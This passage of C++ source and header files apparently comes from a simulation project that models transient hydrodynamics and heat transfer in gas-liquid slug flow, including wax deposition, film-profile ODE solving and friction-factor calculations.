	Cs = DistCoe(RhoS, Vm, IDEf, MuS);
}
void SlugFLowHeatTransferCal::SlugFlowBooleanInitial()
{
for (int xx = 0; xx < Nx; xx++)
{
SlugFlow[xx] = false;
HLTbLocation[xx] = false;
if (xx <= (NxF - 1))
{
SlugFlow[xx] = false;
HLTbLocation[xx] = HLTBOrgNew[xx];
}
if (xx >(NxF - 1))
{
SlugFlow[xx] = true;
}
//s1 = HLTbLocation[xx]; s2 = SlugFlow[xx];
}
}
void SlugFLowHeatTransferCal::SlugFlowBooleanLater(std::vector<bool> SlugFlowPre,
std::vector<double> HLTbLocationPre){
/*
An example for SlugFlow[xx] boolean pre-adjustment
-----------------------------------SlugFlow[xx]--------------------------------------
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1
1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1
1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1
1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0
*/
std::vector<double> HLTbLocation2;
std::vector<bool> SlugFlow2;
SlugFlow2.resize(Nx+1);
HLTbLocation2.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++)
{
if (xx != 0)
{
SlugFlow2[xx] = SlugFlowPre[xx - 1];
HLTbLocation2[xx] = HLTbLocationPre[xx - 1];
}
else
{
SlugFlow2[xx] = SlugFlowPre[Nx - 1];
HLTbLocation2[xx] = HLTbLocationPre[Nx - 1];
}
}
for (int xx = 0; xx < Nx; xx++)
{
SlugFlow[xx] = SlugFlow2[xx];
HLTbLocation[xx] = HLTbLocation2[xx];
}
}
//In this method, the requried multi-dimensional vectors are resized as required
//Clears and (re)sizes every working vector: axial fields to Nx+1, ring
//sector fields to RingSec+1, and the 3-D energy-flux fields to
//[Nx+1][WallLay+1][RingSec+1]. Index 0 is unused for the ring/wall
//dimensions (loops elsewhere start at 1).
void SlugFLowHeatTransferCal::VectorResize()
{
	//Drop any stale contents from a previous run before resizing.
	hHotSave.clear();
	Es.clear();
	Er.clear();
	Ex.clear();
	ETheta.clear();
	KDepoSave.clear();
	riEff.clear();
	EWf.clear();
	EWG.clear();
	EWS.clear();
	ECF.clear();
	ECG.clear();
	ECS.clear();
	Tb.clear();
	Kb.clear();
	TwAv.clear();
	Qtot.clear();
	hBulk.clear();
	ApEff.clear();
	EwfLocal.clear();
	EwgLocal.clear();
	EWsLocal.clear();
	AL.clear();
	AG.clear();
	TLActual.clear();
	TGActual.clear();
	//Axial (per-cell) fields.
	TLActual.resize(Nx + 1);
	TGActual.resize(Nx + 1);
	EWf.resize(Nx + 1);
	EWS.resize(Nx + 1);
	EWG.resize(Nx + 1);
	ECF.resize(Nx + 1);
	ECG.resize(Nx + 1);
	ECS.resize(Nx + 1);
	Tb.resize(Nx + 1);
	Kb.resize(Nx + 1);
	TwAv.resize(Nx + 1);
	Qtot.resize(Nx + 1);
	hBulk.resize(Nx + 1);
	ApEff.resize(Nx + 1);
	//Per-ring-sector fields.
	EwfLocal.resize(RingSec + 1);
	EwgLocal.resize(RingSec + 1);
	EWsLocal.resize(RingSec + 1);
	AL.resize(RingSec + 1);
	AG.resize(RingSec + 1);
	hHotSave.resize(Nx + 1);
	KDepoSave.resize(Nx + 1);
	riEff.resize(Nx + 1);
	Es.resize(Nx + 1);
	Er.resize(Nx + 1);
	Ex.resize(Nx + 1);
	ETheta.resize(Nx + 1);
	//Inner dimensions of the multi-dimensional fields.
	for (int xx = 0; xx < Nx; xx++)
	{
		KDepoSave[xx].resize(RingSec + 1);
		riEff[xx].resize(RingSec + 1);
		Es[xx].resize(WallLay + 1);
		Er[xx].resize(WallLay + 1);
		Ex[xx].resize(WallLay + 1);
		ETheta[xx].resize(WallLay + 1);
		for (int WL = 1; WL < WallLay + 1; WL++)
		{
			Es[xx][WL].resize(RingSec + 1);
			Er[xx][WL].resize(RingSec + 1);
			Ex[xx][WL].resize(RingSec + 1);
			ETheta[xx][WL].resize(RingSec + 1);
		}
	}
}
//Copies the pipe geometry/material properties (inner/outer diameter,
//thermal conductivity, heat capacity, density) into class state.
void SlugFLowHeatTransferCal::PipeSpecs
	(const user::PipeGeometry& PipeProps) {
	IDPipe = PipeProps.IDPipe;
	OD = PipeProps.ODPipe;
	KPipe = PipeProps.KPipe;
	CPPipe = PipeProps.CPPipe;
	RhoPipe = PipeProps.RhoPipe;
}
//Outer-face heat transfer area of one wall layer over one axial cell
//(a quarter-circumference arc, one ring sector, of length dX). The wall
//of thickness w is split into thirds, counted inward from the outer radius.
double SlugFLowHeatTransferCal::Aout(int WallLayer)
{
	const double rLayer = ro - (WallLay - double(WallLayer))*w / 3.0;
	return M_PI * 0.5*rLayer*dX;
}
//Inner-face heat transfer area of one wall layer (quarter arc x dX).
//Layers other than the innermost use the pipe-wall radius; layer 1 sits on
//the wax deposit, so its inner radius is reduced by WaxThickness.
//BUG FIX: the condition was written "if (WallLayer = !1)", which ASSIGNS
//!1 (i.e. 0) to WallLayer, so it was always false and every layer took the
//wax-deposit branch. Intended test is "WallLayer != 1".
double SlugFLowHeatTransferCal::Ain(int WallLayer, double WaxThickness) {
	double ans;
	if (WallLayer != 1)
	{
		ans = M_PI * 0.5*(ro - (WallLay - double(WallLayer) + 1)*w / 3.0)*dX;
	}
	else {
		ans = M_PI * 0.5*(ro - w - WaxThickness)*dX;
	}
	return(ans);
}
//Axial conduction cross-section area of one wall layer (quarter ring at the
//layer's mid-radius). Layer 1 is the wax deposit; other layers are thirds
//of the pipe wall.
//BUG FIX: "if (WallLayer = !1)" assigned 0 to WallLayer (always false), so
//every layer used the wax formula. Intended test is "WallLayer != 1".
double SlugFLowHeatTransferCal::Ax(int WallLayer, double WaxThickness) {
	double ans;
	if (WallLayer != 1)
	{
		ans = M_PI * 0.5*(ro - (WallLay - double(WallLayer))*
			(w / 3.0) - w / (2 * 3.0))*w / 3.0;
	}
	else {
		ans = M_PI * 0.5*(ro - w - WaxThickness / 2.0)*WaxThickness;
	}
	return(ans);
}
//Circumferential conduction area of one wall layer over one axial cell:
//layer radial thickness times dX. Layer 1 is the wax deposit.
//BUG FIX: "if (WallLayer = !1)" assigned 0 to WallLayer (always false), so
//every layer used the wax thickness. Intended test is "WallLayer != 1".
double SlugFLowHeatTransferCal::ATheta(int WallLayer, double WaxThickness) {
	double ans;
	if (WallLayer != 1)
	{
		ans = w / 3.0*dX;
	}
	else {
		ans = WaxThickness * dX;
	}
	return(ans);
}
//Circumferential conduction path length (quarter arc at the layer's
//mid-radius). Layer 1 is the wax deposit.
//BUG FIX: "if (WallLayer = !1)" assigned 0 to WallLayer (always false), so
//every layer used the wax mid-radius. Intended test is "WallLayer != 1".
double SlugFLowHeatTransferCal::dxTheta(int WallLayer, double WaxThickness)
{
	double ans;
	if (WallLayer != 1)
	{
		ans = M_PI * 0.5*(ro - (WallLay - double(WallLayer))* (w / 3.0) - w / (2 * 3.0));
	}
	else {
		ans = M_PI * 0.5*(ro - w - WaxThickness / 2.0);
	}
	return(ans);
}
//Effective thermal conductivity of the wax deposit at temperature T with
//solid wax fraction Fw, using a Maxwell-type composite-medium relation
//around the liquid conductivity KL.
double SlugFLowHeatTransferCal::WaxDepoK(double T,double Fw)
{
	//Refresh phase properties (KL in particular) at the given temperature.
	Update(T, HLLS);
	return KL * (1 + (3 * Fw) / ((KWax + 2 * KL) / (KWax - KL) - Fw));
}
//Effective inner diameter of the pipe after wax deposition: averages the
//wax thickness over all ring sectors and all axial cells, then subtracts
//twice that average from the clean inner diameter.
//Generalization: the per-cell sector average previously divided by the
//literal 4.0; it now divides by RingSec (currently 4, so results are
//unchanged) so the method stays correct if RingSec is ever changed.
double SlugFLowHeatTransferCal::IDEff(std::vector<std::vector<double>>& WaxVector)
{
	double ans;
	double sum=0;
	double sum2=0;
	double AvgThickness;
	for (int j = 0; j < Nx; j++)
	{
		sum = 0;
		//Ring sectors are indexed from 1 (slot 0 unused).
		for (int i = 1; i < RingSec +1; i++)
		{
			sum = sum + WaxVector[j][i];
		}
		sum2 = sum2 + sum / double(RingSec);
	}
	AvgThickness = sum2 / double(Nx);
	ans = IDPipe - 2 * AvgThickness;
	return(ans);
}
}
<file_sep>#ifndef OverlHeatTransfer_H
#define OverlHeatTransfer_H
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "dPCalculation.h"
#include "SlugFlowHeatTransfer.h"
#include "OveralHeatTransfer.h"
namespace MultiphaseTemperature {
//In this class, we will try to calucalte the temperature distribution in counter-current flow
class SlugFlowOveralHeatTranfer {
public:
	//Iterates the slug-flow heat model until the average temperature used
	//for hydrodynamic property updates converges (within EpsLimit) and
	//returns that converged average temperature.
	//FilmInputs: packed film/fluid inputs; WaxWidthVector/WaxSolidFraction:
	//wax deposit geometry and composition; HydroInputs: solver settings;
	//TwInitial: initial wall temperature field; Ts/Tf/Tg: initial slug,
	//film and gas temperature profiles; FilmAssign/SlugAssign: initial
	//film holdup and slug/film tagging; q: heat flux vector; TInlet: inlet
	//temperature.
	double AvgTempForHydroUpdate(std::vector<double>& FilmInputs,
		std::vector<std::vector<double>>& WaxWidthVector, std::vector<std::vector<double>>& WaxSolidFraction,
		std::vector<double>& HydroInputs, std::vector<std::vector<std::vector<double>>>& TwInitial,
		std::vector<double>& Ts, std::vector<double>& Tf, std::vector<double>& Tg, std::vector<double>& FilmAssign,
		std::vector<bool>& SlugAssign, std::vector<double>& q, double TInlet, double EpsLimit);
};
} //end of MultiphaseTemperature namespace
#endif<file_sep>#ifndef SlugFlowHeatTransfer_H
#define SlugFlowHeatTransfer_H
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "dPCalculation.h"
#include "OveralHeatTransfer.h"
namespace MultiphaseTemperature {
//For those flow conditions where Lu is large, bigger Nx can help the accuracy
//Transient slug-flow heat transfer model: marches phase and wall
//temperatures over a periodic slug unit (film region + slug body) split
//into Nx axial cells, WallLay wall layers and RingSec ring sectors.
class SlugFLowHeatTransferCal {
public:
	//static const int NXSize = 50;
	//Calculated two-phase Nusselt number (output of the model).
	double NuNumCal;
	//double NuNumCheck;
	//Main entry point: runs the transient heat transfer calculation.
	void SlugFlowHeatModel(std::vector<double>& FilmInputs,
		std::vector<std::vector<double>>& WaxWidthVector,
		std::vector<std::vector<double>>& WaxSolidFraction,
		std::vector<double>& HydroInputs,
		std::vector<std::vector<std::vector<double>>>& TwInitial,
		std::vector<double>& Ts, std::vector<double>& Tf,
		std::vector<double>& Tg, std::vector<double>& FilmAssign,
		std::vector<bool>& SlugAssign,
		std::vector<double>& q, double TInlet);
	//static const int NTime = 1000;
	//Grid resolution: axial cells, wall layers, ring sectors.
	static const int Nx = 50;
	static const int WallLay = 4;
	static const int RingSec = 4;
	//Pipe's inlet temperature
	//In the case, the Inlet temperature is assumed to he same as the initial condition
	//Number of sections in slug and in film sections
	double UInt;
	double AvgTb=0;
	double AvgTempForHydroUpdate;
	double NxS, NxF;
	double g = 9.8;
	//Phase thermophysical properties (L=liquid, G=gas, S=slug mixture).
	double RhoL, RhoG, MuL, MuG, KG,
		KL, CpL, CpG, IT, KS, RhoS, MuS, CpS;
	//Superficial, translational and in-situ phase velocities.
	double VSG, VSL, VTb, VLLS, VLTB,
		VGTB, VLTB2, VGTB2, VGLS
		, VL, VG, VL2, VG2, Vm;
	double T, AvgTemp,P;
	//Distribution coefficients (gas, slug).
	double Cg, Cs;
	//Slug, film and slug-unit lengths.
	double Ls, Lf, Lu;
	double ECF1, ECF2, ECG1, ECG2, ECS1, ECS2;
	//Stratified-flow geometry of the film region.
	double dL, dG, SI, AGP, ALP;
	double HLTBAvg, hFAvg,HLTB2,HLLS;
	double thetahF;
	//Pipe wall geometry/material properties.
	double w, KPipe,KThermal, CPPipe, RhoPipe,
		PipeRoughness, CpPipe, IDPipe,IDEf, OD, ro, ri;
	//Axial cell size and time step.
	double dX, dt;
	double PressGas, PressFilm;
	double KGSave, KLSave;
	//Running sums for heat-flux and temperature-difference accumulation.
	double sumWF = 0, sumWG = 0, sumWS = 0,
		QSSum = 0, QFSum = 0, QGSum = 0,
		SumhCheck = 0, TSSum = 0, TfSum = 0;
	double WLayD = double(WallLay);
	double hFilmGas, hSlug, hFilmLiquid;
	bool Flag = 1;
	double RhoDepo = 855; //Assumed
	double KWax=0.25;//Assumed
	//Per-cell energy terms: wall (EW*) and convective (EC*) for film,
	//gas and slug, plus bulk fields and per-sector areas.
	std::vector<double> EWf, EWG, EWS, ECF, ECG,ECS, Tb, Kb, TwAv, Qtot, hBulk,
		EwfLocal, EwgLocal, EWsLocal,AL, AG,ApEff;
	double check;
	double RhoJacket = 1080; //should be checked, it is just a prototype
	double QCoolant=0.004600455; //This should be input, it is just a protoype
	double WcJacket;
	std::vector<double> q;
	//Phase temperature profiles (slug, liquid film, gas).
	std::vector<double> TS;
	std::vector<double> TL,TLActual;
	std::vector<double> TG, TGActual;
	std::vector<std::vector<double>> WaxThickness, WaxSolidFrac;
	std::vector<double> xAxisNew, HLTBOrgNew;
	//Energy-flux fields [axial][wall layer][ring sector].
	std::vector<std::vector<std::vector<double>>>Es, Er, Ex, ETheta;
	//Wall temperature field [axial][wall layer][ring sector].
	std::vector<std::vector<std::vector<double>>>Tw;
	std::vector<std::vector<double>>KDepoSave;
	std::vector<double> hHotSave;
	std::vector<std::vector<double>>riEff;
	//Per-cell film holdup and slug/film tagging.
	std::vector<double> HLTbLocation;
	std::vector<bool> SlugFlow;
	//std::ofstream TLOut, TGOut, TW1Out, TW2Out, TW3Out, NuCal, NuCheck,
	//	TW4Out, TW5Out, TW6Out, TW7Out, TW8Out,TWax1, TWax2, TWax3,
	//	TW9Out, Time, Axial, Tbulk;
	/*Input variables are read from the input vectors and are stored to
	appropriate class parameters*/
	void SetVariablesFromIputFiles(std::vector<double>& FilmInputs,
		std::vector<std::vector<double>>& WaxWidthVector,
		std::vector<std::vector<double>>& WaxSolidFraction,
		std::vector<std::vector<std::vector<double>>>& TwInitial,
		std::vector<double>& Ts, std::vector<double>& Tf,
		std::vector<double>& Tg, std::vector<double>& FilmAssign,
		std::vector<bool>& SlugAssign);
	//Hydrodynamic properties are calculated and assigned to class variables
	void HydroUpdate(std::vector<double>&FimInputs,std::vector<double>& HydroInputs);
	/*Convective heat transfer coefficient is calculated. hL,
	hG and hS are calculated in the program*/
	double HeatCoe(double K, double d, double Rho, double V, double Mu, double Cp);
	/*Distribution coefficient is calculated. This parameter is different for
	laminar and for turbulent flow */
	double DistCoe(double Rho, double V, double d, double Mu);
	/*In this method, fluid properties are updated for a given Temperature
	and slug holdup*/
	void Update(double T, double HLLS);
	/* Nusselt number for liquid single phase flow is calculated for Two-Phase
	Nusselt number coefficient correlation */
	double SinglePhaseNu(double Rho, double v, double D, double Mu,
		double Cp, double K, double dx, double E, double H);
	//AG and AL for Er calculation and EwLocal calculations
	void SurfaceAreaAGAL(double Theta, double Top, double Side, double Bot);
	//Stratified flow geometries plus some other related values are calculated
	void UpdateFlowGeomParams(const StratifiedFlowGeometry& FlowGeom, double HL);
	/*The slugFlow boolean is set appropriately for each time step from the
	following two methods*/
	void SlugFlowBooleanInitial();
	void SlugFlowBooleanLater(std::vector<bool> SlugFlowPre,
		std::vector<double> HLTbLocationPre);
	//Correct sizes are assigned to the vectors
	void VectorResize();
	//The pipe's specifications are obtained through this method
	void PipeSpecs(const user::PipeGeometry& PipeProps);
	//Aout in the calculations
	//Ax, ArInn, ArOut, ATheta are calculated in this method
	double Aout(int WallLayer);
	double Ain(int WallLayer, double WaxThickness);
	double Ax(int WallLayer, double WaxThickness);
	double ATheta(int WallLayer, double WaxThickness);
	double dxTheta(int WallLayer, double WaxThickness);
	double WaxDepoK(double T, double Fw);
	double IDEff(std::vector<std::vector<double>>& WaxVector);
};
}//namespace MultiphaseTemperature
#endif<file_sep># C-simulation-for-hydrodynamic-and-heat-transfer-calculations-in-Slug-flow-condition
Through this simulation, a transient hydrodynamic and heat transfer model for gas-liquid slug flow in pipes has been developed. Please see Report.pdf for a complete manual.
<file_sep>#ifndef dPCalculation_H
#define dPCalculation_H
#include <iostream>
#include <cmath>
#include <vector>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include "StratifiedFlowGeometry.h"
namespace MultiphaseTemperature {
//Computes the pressure-gradient contributions of the slug body, liquid
//film and gas core from wall shear stresses and friction factors; all
//work happens in the constructor.
class PressureCal {
public:
	PressureCal(std::vector<double>& Inputs, std::vector<double>& HydroInputs);
	//Total pressure gradient.
	double dP;
	double ShearS, PressSlug /*Pressure contribtion from slug*/, fS /*friction factor*/;
	//Film-region quantities: wall shear, superficial shear, pressure
	//contributions and friction factors.
	double ShearF, ShearSF, PressSFilm, PressFilm, fF,fSF;
	//Gas-core quantities, same layout as the film-region ones.
	double ShearG,ShearSG, PressSGas, PressGas, fG, fSG;
private:
	//Operating conditions and fluid/geometry inputs.
	double VSL, VSG, ID, T, P, PipeRoughness, IT;
	double Vm;
	double RhoG, RhoL, MuL, MuG, RhoS, MuS;
	double HLLS, Lf, Ls,HLTBAvg;
	//Stratified-flow geometry (areas and perimeters).
	double AF, AG, SG, SF, SI;
	double VF, VG, VTb, VLLS, VGLS, VGTB,VLTB;
	//Film-profile solver settings.
	double LfInitial, dx, Epsilon, hMax, EpsilonZh;
	//Tells the number of points in RK45 discretization
	int ZSize;
	std::vector<double> zArray, HLTBArray;
	//There is one shear associated with the slug body section
};
}//End of MultiphaseTemperature namespace
#endif
<file_sep>//In this source file, slug flow hydrodynamic properties are calculated
//with full film profile calculation. In this source file, mainly Taitel and Barnea
//model is developed.
//In this source file, all units are in SI units
#include <iostream>
#include <chrono>
#include <cmath>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include <fstream>
namespace MultiphaseTemperature {
//Final results for Film profile is calculated in "HyrodynamicProperties" method
//Constructor: unpacks the film-profile inputs, evaluates fluid properties
//at (T, P), and computes the closure relations that seed the Taitel-Barnea
//film-profile solution (HLLS initial guess, mixture properties, slug
//length, translational and slug-section phase velocities).
//FilmProfileInputs layout: [0]=VSL, [1]=VSG, [2]=ID, [3]=T, [4]=P,
//[5]=pipe roughness, [6]=interfacial tension.
FilmProfile::FilmProfile(std::vector<double>& FilmProfileInputs) {
	//???????????????
	Flag2 = 0;
	g = 9.8;
	VSL = FilmProfileInputs[0];
	VSG = FilmProfileInputs[1];
	ID = FilmProfileInputs[2];
	T = FilmProfileInputs[3];
	P = FilmProfileInputs[4];
	PipeRoughness = FilmProfileInputs[5];
	IT = FilmProfileInputs[6];//InterfactialTension
	//Mixture velocity
	Vm = VSL + VSG;
	//Distribution variable
	C0 = 1.2;
	user::PipeGeometry PipeProps;
	OD = PipeProps.ODPipe;
	user::FluidProperties Fluid(T, P);
	//This value is slightly overestimated in compare with what Ake
	//reported in EXCEL file. The answer will be noticably different
	//if the values from Ake EXCEL file is used
	RhoG = Fluid.Gas.Rho(Fluid); // or RhoG = Fluid.Gas.Rho2(Fluid) (for P=350Psi)
	//From fitting correlations
	RhoL = Fluid.Liquid.Rho(Fluid);
	MuL = Fluid.Liquid.Mu(Fluid);
	MuG = Fluid.Gas.Mu(Fluid);
	// Gregory correlation - suggested by Zhang 2003 for initial guess of HLLS
	HLLS = 1 / (1 + pow(Vm / 8.66, 1.39));
	/*********Some other HLLS relations***********/
	//HLLS = exp(-(2.48*pow(10, -6)*ReLS));
	/*HLLS = 1 - 0.058*(2 * pow(0.4*IT /
	((RhoL - RhoG)*9.8), 0.5)*pow(RhoL /
	IT, 0.6)*pow(2.0/ID* 0.007*pow(VSG+VSL,3), 0.4) - 0.725, 2); */
	//Mixture properties (holdup-weighted averages)
	RhoS = RhoL * HLLS + RhoG * (1 - HLLS);
	MuS = MuL * HLLS + MuG * (1 - HLLS);
	//From (Pan, 2010), the average slug length
	//for oil/Air experiments was reported to be 24D for Mu = 4 Cp
	Ls = 30 * ID;
	//Translational velocity (drift-flux form with C0 = 1.2)
	VTb = C0 * (VSL + VSG) + 0.54*pow(g*ID, 0.5);
	//Velocity of gas and liquid phase in slug section
	VGLS = C0 * (VSL + VSG);
	VLLS = ((VSL + VSG) - VGLS * (1 - HLLS)) / HLLS;
	Flag2 = 0;
}
//Fanning friction factor (main relation-implicit)
double FilmProfile::FannningFrictionFactor(double Rho, double V,
	double ID, double Mu,
	double Roughness) {
	//Solves the implicit Colebrook-type relation
	//  1/sqrt(f) + 4*log10( (Roughness/ID)/3.7 + 1.256/(Re*sqrt(f)) ) = 0
	//for the Fanning friction factor with Newton's method, using a
	//forward-difference derivative.
	const double Re = Rho * V*ID / Mu;
	const double dx = 1E-10;      //finite-difference step
	double ans = 0.0001;          //initial guess for f
	double Eps = 10;              //residual at the previous iterate
	//Residual of the implicit relation at a trial friction factor.
	auto Residual = [&](double f) {
		return 1 / pow(f, 0.5) + 4 * log10(((Roughness / ID) / (3.7)) + (1.256 / (Re*pow(f, 0.5))));
	};
	while (Eps > 1E-15)
	{
		const double F = Residual(ans);
		const double FPrime = (Residual(ans + dx) - F) / dx;
		ans = ans - F / FPrime;
		Eps = F;
	}
	return(ans);
}
//ODE of dhF/dz is calculated in this method
//Right-hand side of the Taitel-Barnea film-profile ODE: returns dhF/dz for
//the current film height hF, built from the stratified-flow geometry,
//wall/interfacial shear stresses and the momentum terms of both phases.
double FilmProfile::hFdZ(double hF) {
	//Stratified Geometric parameters
	double SG, SF, SI;
	double AF, AG;
	//Shear terms from liquid and gas to wall and from gas to liquid interface
	double fF, fG, fI; //NOTE(review): fI declared but unused (fG reused for the interface)
	double ShearF, ShearG, ShearI;
	double checking; //NOTE(review): unused
	//Relative velocities to VTb
	double VF, VG;
	//other variables
	double hLTilt = hF / ID;//This is not liquid phase holdup
	double HL; //This is liquid holdup
	double A; //NOTE(review): unused
	double dHLTBdhF;// dHLTB/dhF
	double ans;
	// H should be liquid holdup!
	//At this point, we need to calculate the liquid holdup
	//Becase we need liquid holdup (not liquid height) for stratified geometry class
	hLTilt = hF / ID;
	//Now we can calculate the liquid phase holdup (circular-segment formula)
	HL = (1 / Pi)*(Pi - acos(2 * hF / ID - 1) + (2 * hF / ID - 1)*
		pow(1 - pow(2 * hF / ID - 1, 2), 0.5));
	//Parameters of stratified flow geometry are calculated for the given liquid holdup
	StratifiedFlowGeometry Geometry(HL,ID);
	AF = Geometry.ALTilt*ID*ID;
	AG = Geometry.AGTilt*ID*ID;
	SG = Geometry.SGTilt*ID;
	SF = Geometry.SLTilt*ID;
	SI = Geometry.SITilt*ID;
	//Relative velocities (referenced to VTb) from mass balance with the slug
	VF = (VTb - VLLS)*HLLS / HL;
	VG = (VTb - VGLS)*(1 - HLLS) / (1 - HL);
	//Actual velocities of film and gas core in stratified region
	VLTB = VTb - VF;
	VGTB = VTb - VG;
	//Derivative of holdup with respect to film height
	dHLTBdhF = (4.0 / (Pi*ID))*pow(1 - pow(2 * hF / ID - 1, 2), 0.5);
	//Friction factors (hydraulic diameters 4A/S for each phase)
	fF = FannningFrictionFactor(RhoL, abs(VLTB), 4 * AF / SF, MuL, PipeRoughness);
	fG = FannningFrictionFactor(RhoG, abs(VGTB), 4 * AG / (SI + SG),
		MuG, PipeRoughness);
	//shear terms
	ShearF = fF * RhoL*abs(VLTB)*VLTB / 2.0;
	ShearG = fG * RhoG*abs(VGTB)*VGTB / 2.0;
	ShearI = fG * RhoG*abs(VGTB - VLTB)*(VGTB - VLTB) / 2.0;
	//If interface shear is neglected, it affects the the results massively
	ans = ((ShearF*SF / AF) - (ShearG*SG / AG) - (ShearI*SI*(1 / AF + 1 / AG)))
		/ ((RhoL - RhoG)*g - (RhoL*VF*(VTb - VLLS)*HLLS*dHLTBdhF / HL / HL)
			- (RhoG*VG*(VTb - VGLS)*(1 - HLLS)*dHLTBdhF / (1 - HL) / (1 - HL)));
	return(ans);
}
//Denominator of the film-profile ODE at film height hF. Its root is the
//critical film height where dhF/dz becomes singular; used by
//hFCriticalDetermination to pick a safe boundary condition.
double FilmProfile::hFCritical(double hF)
{
	//Stratified Geometric parameters
	double SG, SF, SI;
	double AF, AG;
	//Relative velocities to VTb
	double VF, VG;
	//other variables
	double hLTilt = hF / ID;//This is not liquid phase holdup
	double HL; //This is liquid holdup
	double dHLTBdhF;// dHLTB/dhF
	hLTilt = hF / ID;
	//Now we can calculate the liquid phase holdup (circular-segment formula)
	HL = (1 / Pi)*(Pi - acos(2 * hF / ID - 1) + (2 * hF / ID - 1)*
		pow(1 - pow(2 * hF / ID - 1, 2), 0.5));
	StratifiedFlowGeometry Geometry(HL,ID);
	AF = Geometry.ALTilt*ID*ID;
	AG = Geometry.AGTilt*ID*ID;
	SG = Geometry.SGTilt*ID;
	SF = Geometry.SLTilt*ID;
	SI = Geometry.SITilt*ID;
	//Relative velocities (referenced to VTb)
	VF = (VTb - VLLS)*HLLS / HL;
	VG = (VTb - VGLS)*(1 - HLLS) / (1 - HL);
	//Actual velocities of film and gas core in stratified region
	VLTB = VTb - VF;
	VGTB = VTb - VG;
	dHLTBdhF = (4.0 / (Pi*ID))*pow(1 - pow(2 * hF / ID - 1, 2), 0.5);
	//Gravity term minus the momentum terms of both phases.
	return(((RhoL - RhoG)*g - (RhoL*VF*(VTb - VLLS)*HLLS*dHLTBdhF / HL / HL)
		- (RhoG*VG*(VTb - VGLS)*(1 - HLLS)*dHLTBdhF / (1 - HL) / (1 - HL))));
}
//Finds the critical film height (root of hFCritical) with Newton's method,
//starting from 81% of the liquid height corresponding to the Gregory HLLS.
double FilmProfile::hFCriticalDetermination()
{
	double HL;
	double dx = 0.00001;    //finite-difference step for the derivative
	double x, FPrime = 0;
	double Error = 10;
	//Gregory correlation for slug-body holdup, used to size the start point.
	HLLS = 1 / (1 + pow(Vm / 8.66, 1.39));
	StratifiedFlowGeometry Geometry(HLLS,ID);
	x= Geometry.hLTilt *ID*0.81;
	while (Error > 0.00001)
	{
		FPrime = (hFCritical(x +dx) - hFCritical(x)) / dx;
		x = x - hFCritical(x) / FPrime;
		Error = abs(hFCritical(x));
	}
	//err = hFCritical(x, hMax, EpsilonZh);
	//Holdup at the critical height (computed for reference; not returned).
	HL=(1 / Pi)*(Pi - acos(2 * x / ID - 1) + (2 * x / ID - 1)*
		pow(1 - pow(2 * x / ID - 1, 2), 0.5));
	return(x);
}
//In this method, the the film profile is calculated and
//mass balanced is checked from a given film length
//For a trial film length Lf, integrates the film-height ODE (adaptive RK45)
//along the film, iterates the implicit Zhang (2003) HLLS closure to
//convergence, and returns the liquid mass-balance error Eps. The outer
//solver (LfDetermination) drives this residual to zero in Lf.
//Side effects: fills hFArray/zArray, updates HLLS, HLTBAvg, hFAvg, VLTB,
//VGTB, RhoS, MuS and ZSize.
double FilmProfile::hFDetermination(double Lf, double hMax,double EpsilonZh) {
	hFArray.clear();
	zArray.clear();
	std::ofstream output;
	output.open("Output.txt");
	int zLoop;
	//Average HLTB based on predicted film profile
	//Unit slug length
	double Lu;
	Lu = Lf + Ls;
	//RK45 variables
	double z = 0;
	double h = 0.000001;          //current step size
	double RKFEps = 0.00001;      //per-step error tolerance
	double TotalZ = Lf;           //integration length (whole film)
	double StepRatio = 1;         //adaptive step-size multiplier
	double hMin = 0.000001;
	double TotalCount, F;
	double XxAtZ, hminCondition;
	double xx;
	double KK[6];                 //RK45 stage slopes
	double ERK4, ERKFVal;         //embedded error estimates
	double HLTBPrev;
	//Error
	double Eps = 10, Eps2 = 10;
	//location dependent film liquid holdup and velociy
	//Other hydrodynamic parameters
	double x;
	double hF;
	double hFLLS; //hF for HLLS
	double fS;
	double HLTBComparison = 10;
	//liquid mass flow rate
	double WLCal; //Calculated liquid mass flow rate to be checked
	double WL = VSL * Pi*0.25*ID*ID*RhoL; //input liquid mass flow rate
	//other variables
	double gEnglish = 32.2;
	double Sum = 0, Sum2 = 0, Sum3 = 0, SumHfAvg = 0;
	double Flag = 0;
	double Tsm;
	double PreVal = 0;
	k = 0;
	//Gregory correlation as the starting HLLS guess.
	HLLS = 1 / (1 + pow(Vm / 8.66, 1.39));
	//In this while loop, the HLLS from Zhang 2003 is calculated.
	//His approach is in implicit form and that is why it requires an
	//iterative approach to be solved.
	while (HLTBComparison > EpsilonZh)
	{
		//Reset the profile and RK45 state for this HLLS iteration.
		hFArray.clear();
		zArray.clear();
		z = 0;
		h = 0.0000001;
		RKFEps = 0.00001;
		TotalZ = Lf;
		double StepRatio = 1;
		hMin = 0.000001;
		k = k + 1;
		//liquid height for HLLS is calculated
		StratifiedFlowGeometry Geometry(HLLS,ID);
		hFLLS = Geometry.hLTilt*ID*0.99;
		//Start just below the critical height if the ODE slope is positive
		//at the slug liquid height (avoids the singular denominator).
		if (hFdZ(hFLLS) > 0)
		{
			hF = hFCriticalDetermination()*0.99;
		}
		else {
			hF = hFLLS;
		}
		hFArray.push_back(hF);
		zArray.push_back(0);
		//This is boundary condition for ODE of dhF/dz
		//These hydrodynamic parameters are recalculated using the new HLLS
